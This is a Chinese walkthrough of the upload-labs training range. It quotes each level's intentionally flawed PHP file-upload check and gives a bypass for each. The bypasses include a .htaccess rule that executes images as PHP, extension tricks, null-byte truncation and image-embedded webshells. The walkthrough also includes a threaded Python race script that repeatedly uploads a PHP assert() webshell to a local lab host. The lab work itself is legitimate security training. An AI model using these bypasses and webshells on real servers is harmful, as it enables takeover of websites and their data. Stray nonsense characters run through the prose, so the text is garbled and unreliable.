文件上傳的目的是通過(guò)上傳.php文件募疮,從而植入木馬拧略,然后通過(guò)菜刀進(jìn)行連接犀农,最終get shell
0x01 Pass-01
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("請(qǐng)選擇要上傳的文件!");
return false;
}
//定義允許上傳的文件類型
var allow_ext = ".jpg|.png|.gif";
//提取上傳文件的類型
var ext_name = file.substring(file.lastIndexOf("."));
//判斷上傳文件類型是否允許上傳
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "該文件不允許上傳摇天,請(qǐng)上傳" + allow_ext + "類型的文件,當(dāng)前文件類型為:" + ext_name;
alert(errMsg);
return false;
}
}
攔截方式:根據(jù)上傳文件的后綴是否為.img格式來(lái)判斷文件能否上傳蒲讯;
繞過(guò)方式:將木馬偽裝成.img文件忘朝,上傳后burp攔截?cái)?shù)據(jù)包,更改文件后綴為.php判帮,再forward.
0x02 Pass-02
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)局嘁!';
}
} else {
$msg = '文件類型不正確溉箕,請(qǐng)重新上傳!';
}
} else {
$msg = UPLOAD_PATH.'文件夾不存在,請(qǐng)手工創(chuàng)建悦昵!';
}
}
攔截方式:對(duì)文件的MIME(Multipurpose Internet Mail Extensions)進(jìn)行了驗(yàn)證肴茄,只允許圖片類的MIME類型通過(guò)
繞過(guò)方式:直接上傳木馬文件,burp截包但指,修改Content-Type為image/gif寡痰,go....
0x03 Pass-03
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else {
$msg = '不允許上傳.asp,.aspx,.php,.jsp后綴文件棋凳!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建拦坠!';
}
}
攔截方式:黑名單驗(yàn)證('.asp','.aspx','.php','.jsp')
繞過(guò)方式:
(1)可上傳php3,php5...等這樣可以被服務(wù)器解析的后綴名
(2)重寫文件解析規(guī)則繞過(guò),先上傳一個(gè).htaccess文件剩岳,再上傳一個(gè)1.jpg文件(內(nèi)含木馬)
通過(guò).htaccess文件調(diào)用php解析器去解析一個(gè)文件名中只要包含"1.jpg"這個(gè)字符串的任意文件贞滨,
無(wú)論擴(kuò)展名是什么(沒(méi)有也行),都以php的方式來(lái)解析
.htaccess文件內(nèi)容:
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
0x04 Pass-04
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)拍棕!';
}
} else {
$msg = '此文件不允許上傳!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建晓铆!';
}
}
攔截方式:對(duì)上傳文件的后綴名的判斷種類增加
繞過(guò)方式:重寫文件解析規(guī)則繞過(guò)(第3關(guān)(2))
0x05 Pass-05
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else {
$msg = '此文件類型不允許上傳绰播!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建骄噪!';
}
}
攔截方式:.htaccess加入了黑名單,取消了后綴名全變?yōu)樾懽帜傅暮瘮?shù)
繞過(guò)方式:采用大小寫混合方式繞過(guò).Php,.PHp5...
0x06 Pass-06
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)幅垮!';
}
} else {
$msg = '此文件不允許上傳';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建腰池!';
}
}
- 題目沒(méi)有去除文件尾部的空格, 所以使用 burpsuite 抓包文件名添加空格即可繞過(guò).
0x07 Pass-07
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else {
$msg = '此文件類型不允許上傳忙芒!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建示弓!';
}
}
攔截方式:.htaccess加入了黑名單,后綴名全變?yōu)樾懽帜傅暮瘮?shù)依舊存在
繞過(guò)方式:利用windows系統(tǒng)的文件名特性
(不允許有.單獨(dú)存在),上傳1.php呵萨,burp截包,將后綴改為1.php .的形式奏属,上傳后保存在Windows系統(tǒng)上的文件名最后的一個(gè).會(huì)被去掉,實(shí)際上保存的文件名就是1.php
0x08 Pass-08
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)潮峦!';
}
} else {
$msg = '此文件類型不允許上傳囱皿!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建!';
}
}
攔截方式:缺少
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA繞過(guò)方式:利用windows文件流特性繞過(guò)忱嘹,1.php上傳,burp截包,改為
1.php::$DATA嘱腥,上傳成功后文件名為1.php
0x09 Pass-09
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else {
$msg = '此文件類型不允許上傳拘悦!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建齿兔!';
}
}
- 本題中的代碼后綴名處理的不夠嚴(yán)謹(jǐn), 先去除了文件后面的., 再去除了文件后綴的空格, 由于只處理了一次, 所以可以通過(guò)上傳1.php. . 原理跟前面幾題基本一樣.
0x10 Pass-10
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建!';
}
}
攔截方式:
$file_name = str_ireplace($deny_ext,"", $file_name);, 作用是把黑名單里面的后綴名替換成空, 由于只替換了一遍, 只對(duì)文件名進(jìn)行了一次過(guò)濾分苇,所以可以采用雙寫繞過(guò)添诉。繞過(guò)方式:構(gòu)造雙重文件名,1.phphpp
0x11 Pass-11
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上傳出錯(cuò)!';
}
} else{
$msg = "只允許上傳.jpg|.png|.gif類型文件医寿!";
}
}
攔截方式:以時(shí)間戳方式對(duì)上傳文件進(jìn)行命名
繞過(guò)方式:使用上傳路徑名%00截?cái)嗬@過(guò)栏赴,不過(guò)這需要對(duì)文件有足夠的權(quán)限,比如說(shuō)創(chuàng)建
文件夾靖秩,上傳的文件名寫成1.jpg, save_path改成../upload/1.php%00须眷,最后保存下來(lái)的文件就是1.php
//某些情況下可以使用 %00 截?cái)?br> 1、PHP 版本 < 5.3.4
2盆偿、php.ini 中 magic_quotes_gpc=off
0x12 Pass-12
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳失敗";
}
} else {
$msg = "只允許上傳.jpg|.png|.gif類型文件柒爸!";
}
}
- 原理與11相同,
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;save_path從 GET 變成了 POST, 此時(shí)不能再使用 %00 截?cái)? 原因是 %00 截?cái)嘣?GET 中被 url 解碼之后是空字符, 但是在 POST 中 %00 不會(huì)被 url 解碼, 所以只能通過(guò) burpsuite 修改 hex 值為 00 進(jìn)行截?cái)?
這里把 2b('+'的 hex) 修改成 00
0x13 Pass-13
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只讀2字節(jié)
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知事扭,上傳失斏又伞!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯(cuò)求橄!";
}
}
}
攔截方式:1今野、保證上傳后的圖片馬中仍然包含完整的一句話或webshell代碼。2.圖片馬要.jpg,.png,.gif三種后綴都上傳成功才算過(guò)關(guān)罐农!
繞過(guò)方式:
(1)只讀文件的前兩個(gè)字節(jié)条霜,在文件的開(kāi)端添加gif的標(biāo)志文件頭GIF89a,可進(jìn)行繞過(guò);
(2)使用命令copy 1.jpg /b + shell.php /a webshell.jpg將一句話木馬添加到圖片中也可(但是我們沒(méi)有辦法拿到shell涵亏,應(yīng)為我們上傳的圖片馬無(wú)法被解析成php形式宰睡,通常圖片馬配合%00或者0x00截?cái)嗌蟼鳎蛘吲浜辖馕雎┒?
0x14 Pass-14
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知气筋,上傳失敳鹉凇!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯(cuò)宠默!";
}
}
}
- 攔截方式:
(1)getimagesize() 函數(shù)用于獲取圖像尺寸麸恍,給出的是圖像的類型,返回的是數(shù)字搀矫,其中1 = GIF抹沪,2 = JPG,3 = PNG瓤球,4 = SWF融欧,5 = PSD,6 = BMP卦羡,7 = TIFF(intel byte order)蹬癌,8 = TIFF(motorola byte order)权她,9 = JPC虹茶,10 = JP2逝薪,11 = JPX,12 = JB2蝴罪,13 = SWC董济,14 = IFF,15 = WBMP要门,16 = XBM
(2)image_type_to_extension() 函數(shù)用于獲取圖片后綴 - 繞過(guò)方式:同 13
0x15 Pass-15
function isImage($filename){
//需要開(kāi)啟php_exif模塊
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知虏肾,上傳失敗欢搜!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯(cuò)封豪!";
}
}
}
攔截方式:exif_imagetype的作用也是根據(jù)文件頭判斷文件類型, 所以一樣可以使用圖片馬繞過(guò).
繞過(guò)方式:同13
0x16 Pass-16
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 獲得上傳文件的基本信息,文件名炒瘟,類型吹埠,大小,臨時(shí)文件路徑
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.basename($filename);
// 獲得上傳文件的擴(kuò)展名
$fileext= substr(strrchr($filename,"."),1);
//判斷文件后綴與類型疮装,合法才進(jìn)行上傳操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上傳的圖片生成新的圖片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "該文件不是jpg格式的圖片缘琅!";
@unlink($target_path);
}else{
//給新圖片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
$newimagepath = UPLOAD_PATH.$newfilename;
imagejpeg($im,$newimagepath);
//顯示二次渲染后的圖片(使用用戶上傳圖片生成的新圖片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上傳出錯(cuò)!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上傳的圖片生成新的圖片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "該文件不是png格式的圖片廓推!";
@unlink($target_path);
}else{
//給新圖片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
$newimagepath = UPLOAD_PATH.$newfilename;
imagepng($im,$newimagepath);
//顯示二次渲染后的圖片(使用用戶上傳圖片生成的新圖片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上傳出錯(cuò)刷袍!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上傳的圖片生成新的圖片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "該文件不是gif格式的圖片!";
@unlink($target_path);
}else{
//給新圖片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
$newimagepath = UPLOAD_PATH.$newfilename;
imagegif($im,$newimagepath);
//顯示二次渲染后的圖片(使用用戶上傳圖片生成的新圖片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上傳出錯(cuò)樊展!";
}
}else{
$msg = "只允許上傳后綴為.jpg|.png|.gif的圖片文件呻纹!";
}
}
- 原理:將一個(gè)正常顯示的圖片,上傳到服務(wù)器专缠。尋找圖片被渲染后與原始圖片部分對(duì)比仍然相同的數(shù)據(jù)塊部分雷酪,將Webshell代碼插在該部分,然后上傳藤肢。具體實(shí)現(xiàn)需要自己編寫Python程序太闺,人工嘗試基本是不可能構(gòu)造出能繞過(guò)渲染函數(shù)的圖片webshell的。
這里提供一個(gè)包含一句話webshell代碼并可以繞過(guò)PHP的imagecreatefromgif函數(shù)的GIF圖片示例嘁圈。
php圖像二次渲染:
https://blog.csdn.net/hitwangpeng/article/details/48661433
https://blog.csdn.net/hitwangpeng/article/details/46548849
0x17 Pass-17
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允許上傳.jpg|.png|.gif類型文件省骂!";
unlink($upload_file);
}
}else{
$msg = '上傳出錯(cuò)!';
}
}
- 利用條件競(jìng)爭(zhēng)刪除文件時(shí)間差繞過(guò)最住。使用命令pip install hackhttp安裝hackhttp模塊钞澳,運(yùn)行下面的Python代碼即可。如果還是刪除太快涨缚,可以適當(dāng)調(diào)整線程并發(fā)數(shù)轧粟。
#!/usr/bin/env python
# coding:utf-8
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
def upload(lists):
hh = hackhttp.hackhttp()
raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341
-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream
<?php assert($_POST["LandGrey"])?>
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"
上傳
-----------------------------6696274297634--
"""
code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
print(str(code) + "\r")
pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()
在腳本運(yùn)行的時(shí)候,訪問(wèn)Webshell
0x18 Pass-18
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload(UPLOAD_PATH);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已經(jīng)被上傳,但沒(méi)有重命名兰吟。';
break;
case -1:
$msg = '這個(gè)文件不能上傳到服務(wù)器的臨時(shí)文件存儲(chǔ)目錄通惫。';
break;
case -2:
$msg = '上傳失敗,上傳目錄不可寫混蔼。';
break;
case -3:
$msg = '上傳失敗履腋,無(wú)法上傳該類型文件。';
break;
case -4:
$msg = '上傳失敗惭嚣,上傳的文件過(guò)大遵湖。';
break;
case -5:
$msg = '上傳失敗,服務(wù)器已經(jīng)存在相同名稱文件晚吞。';
break;
case -6:
$msg = '文件無(wú)法上傳延旧,文件不能復(fù)制到目標(biāo)目錄。';
break;
default:
$msg = '未知錯(cuò)誤槽地!';
break;
}
}
//myupload.php
class MyUpload{
......
......
......
var $cls_arr_ext_accepted = array(
".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
".html", ".xml", ".tiff", ".jpeg", ".png" );
......
......
......
/** upload()
**
** Method to upload the file.
** This is the only method to call outside the class.
** @para String name of directory we upload to
** @returns void
**/
function upload( $dir ){
$ret = $this->isUploadedFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->setDir( $dir );
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkExtension();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkSize();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// if flag to check if the file exists is set to 1
if( $this->cls_file_exists == 1 ){
$ret = $this->checkFileExists();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, we are ready to move the file to destination
$ret = $this->move();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// check if we need to rename the file
if( $this->cls_rename_file == 1 ){
$ret = $this->renameFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, everything worked as planned :)
return $this->resultUpload( "SUCCESS" );
}
......
......
......
};
- 剛開(kāi)始沒(méi)有找到繞過(guò)方法迁沫,最后下載作者Github提供的打包環(huán)境,利用上傳重命名競(jìng)爭(zhēng)+Apache解析漏洞闷盔,成功繞過(guò)弯洗。
上傳名字為18.php.7Z的文件,快速重復(fù)提交該數(shù)據(jù)包逢勾,會(huì)提示文件已經(jīng)被上傳牡整,但沒(méi)有被重命名∧绻埃快速提交上面的數(shù)據(jù)包逃贝,可以讓文件名字不被重命名上傳成功,然后利用Apache的解析漏洞迫摔,即可獲得shell沐扳。
0x19 Pass-19
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_POST['save_name']);
$file_name = deldot($file_name);//刪除文件名末尾的點(diǎn)
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上傳出錯(cuò)!';
}
}else{
$msg = '禁止保存為該類型文件句占!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請(qǐng)手工創(chuàng)建沪摄!';
}
}
- 原理同11,上傳的文件名用0x00繞過(guò)纱烘。改成19.php【二進(jìn)制00】.1.jpg
